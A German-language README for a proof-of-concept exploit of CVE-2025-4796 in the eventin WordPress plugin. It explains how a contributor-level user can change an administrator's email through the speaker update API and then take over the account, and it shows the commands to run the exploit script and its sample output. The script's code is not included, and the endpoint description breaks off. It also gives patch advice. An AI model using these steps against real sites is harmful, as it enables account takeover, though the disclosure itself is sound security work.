
eventin <= 4.0.34 - Privilegieneskalation durch Änderung der Benutzer-E-Mail / Kontoübernahme für authentifizierte Beitragende+
eventin <= 4.0.34 - Privilegieneskalation durch Änderung der Benutzer-E-Mail / Kontoübernahme für authentifizierte Beitragende und höher
Ein Privilegieneskalationsfehler im eventin WordPress-Plugin (<= 4.0.34) ermöglicht es jedem Beitragenden oder höher berechtigten Benutzer, die E-Mail eines beliebigen Benutzers über die Speaker-Update-API des Plugins zu ändern. Indem die E-Mail eines Administrators auf eine vom Angreifer kontrollierte E-Mail geändert wird, kann dieser das Passwort zurücksetzen und das Konto übernehmen.
eventin\speaker\api\speakercontroller::update_item)eventin überprüft nicht richtig, wer die Aktualisierung anfordert oder ob der Benutzer die E-Mail ändern darf. Ein Beitragender oder höher kann diesen Endpunkt aufrufen:
Anforderungen:
Installiere requests:
pip install requests
Führe das Skript aus und gib die erforderlichen Werte ein, wenn du dazu aufgefordert wirst:
python3 CVE-2025-4796.py
[+] Deaktiviere SSL-Verifizierungswarnungen
[+] Anmeldung bei WordPress.
[+] Anmeldung erfolgreich.
[+] Abrufen des Nonce-Tokens
[+] Nonce-Token gefunden: abcdef1234567890
[+] Aktualisierungsanfrage für Speaker-E-Mail
[+] Aktualisierungsvorgang erfolgreich.
url: http://example.com
id: 123
email: [email protected].
user: attacker
pass: yourpassword
{.
"id": 123,
"email": "[email protected]",
"name": "Speaker Name",
...
}.
Ein Patch wurde in Version 4.0.35 des eventin-Plugins veröffentlicht. Website-Administratoren wird dringend empfohlen, sofort auf diese Version zu aktualisieren. Der Fix enthält zusätzliche Benutzerüberprüfungen in der Funktion SpeakerController::update_item.